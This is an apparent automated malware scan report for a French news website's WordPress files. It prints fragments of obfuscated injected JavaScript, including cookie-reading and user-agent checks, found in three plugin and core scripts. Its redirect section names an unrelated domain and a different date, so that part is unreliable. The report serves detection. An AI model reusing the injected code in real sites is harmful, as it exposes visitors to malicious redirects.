Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=the-provence-herald.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: advance-cambodia.com
Result:
HTTP/1.1 301 Moved Permanently
Date: Tue, 24 Feb 2015 17:27:32 GMT
Location: http://www.advance-cambodia.com/
Server: Microsoft-IIS/7.0
Content-Length: 155
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
...155 bytes of data.
GET / HTTP/1.1
Host: advance-cambodia.com
Result:
HTTP/1.1 301 Moved Permanently
Date: Tue, 24 Feb 2015 17:27:32 GMT
Location: http://www.advance-cambodia.com/
Server: Microsoft-IIS/7.0
Content-Length: 155
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
...155 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: advance-cambodia.com
Referer: http://www.google.com/search?q=advance-cambodia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: advance-cambodia.com
Referer: http://www.google.com/search?q=advance-cambodia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://www.the-provence-herald.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 09:17:33 GMT Location: http://www.provenceherald.com/ Server: Apache Vary: Accept-Encoding Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: clusterBAK=R1564860580; path=/; expires=Sun, 05-Oct-2014 10:17:02 GMT Set-Cookie: cluster=R1649372598; path=/; expires=Sun, 05-Oct-2014 10:31:58 GMT | malicious |
http://www.provenceherald.com/ | 200 OK Content-Length: 74272 Content-Type: text/html | clean |
http://www.theprovenceherald.fr/wp-content/themes/my_theme/js/jquery.js?ver=3.8.4 | 200 OK Content-Length: 262799 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-content/plugins/paid-memberships-pro/js/paid-memberships-pro.js?ver=3.8.4 | 200 OK Content-Length: 1386 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-content/plugins/sitepress-multilingual-cms/res/js/language-selector.js?ver=3.8.4 | 200 OK Content-Length: 2156 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t } return false; }, close: function(e){ if(!wpml_language_selector_click.ls_click_flag){ var sel = document.getElementById('lang_sel_click').children[0].children[0].children[1]; sel.style.visibility = 'hidden'; } wpml_language_selector_click.ls_click_flag = false; } } Antivirus reports:
| ||
http://www.theprovenceherald.fr/wp-content/plugins/wp-tell-a-friend-popup-form/tell-a-friend-form.js?ver=3.8.4 | 200 OK Content-Length: 5625 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-content/plugins/wp-tell-a-friend-popup-form/tell-a-friend-popup.js?ver=3.8.4 | 200 OK Content-Length: 7876 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-includes/js/wp-ajax-response.min.js?ver=3.8.4 | 200 OK Content-Length: 3120 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.theprovenceherald.fr/wp-content/plugins/theme-my-login/modules/ajax/js/ajax.js?ver=3.8.4 | 200 OK Content-Length: 3801 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t tmlAjax.window.unbind().remove(); }); tmlAjax.overlay .fadeTo('slow', 0, function() { tmlAjax.overlay.unbind().remove(); }); }, reposition : function() { this.window.css({ marginTop: '-' + parseInt((this.window.outerHeight() / 2),10) + 'px', marginLeft: '-' + parseInt((this.window.outerWidth() / 2),10) + 'px' }); } } $(document).ready(tmlAjax.init); })(jQuery); Antivirus reports:
| ||
http://www.theprovenceherald.fr/wp-content/themes/my_theme/js/modernizr.js?ver=3.8.4 | 200 OK Content-Length: 10341 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-content/themes/my_theme/js/jetmenu.js?ver=3.8.4 | 200 OK Content-Length: 4540 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-content/themes/my_theme/js/ms_functions.js?ver=3.8.4 | 200 OK Content-Length: 2243 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-content/themes/my_theme/js/source/jquery.fancybox.js?ver=3.8.4 | 200 OK Content-Length: 49759 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=3.8.4 | 200 OK Content-Length: 2117 Content-Type: text/javascript | clean |
http://www.theprovenceherald.fr/wp-content/themes/my_theme/js/foundation.min.js | 200 OK Content-Length: 38688 Content-Type: text/javascript | clean |
http://www.the-provence-herald.com/!cid_8520DE8C-9761-46E7-B25A-938E0A552BAA | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 09:17:40 GMT Location: http://www.provenceherald.com/!cid_8520DE8C-9761-46E7-B25A-938E0A552BAA Server: Apache Vary: Accept-Encoding Content-Length: 279 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: clusterBAK=R1564895428; path=/; expires=Sun, 05-Oct-2014 10:16:53 GMT Set-Cookie: cluster=R1649372598; path=/; expires=Sun, 05-Oct-2014 10:16:53 GMT | malicious |
http://www.provenceherald.com/!cid_8520de8c-9761-46e7-b25a-938e0a552baa | 404 Not Found Content-Length: 38081 Content-Type: text/html | clean |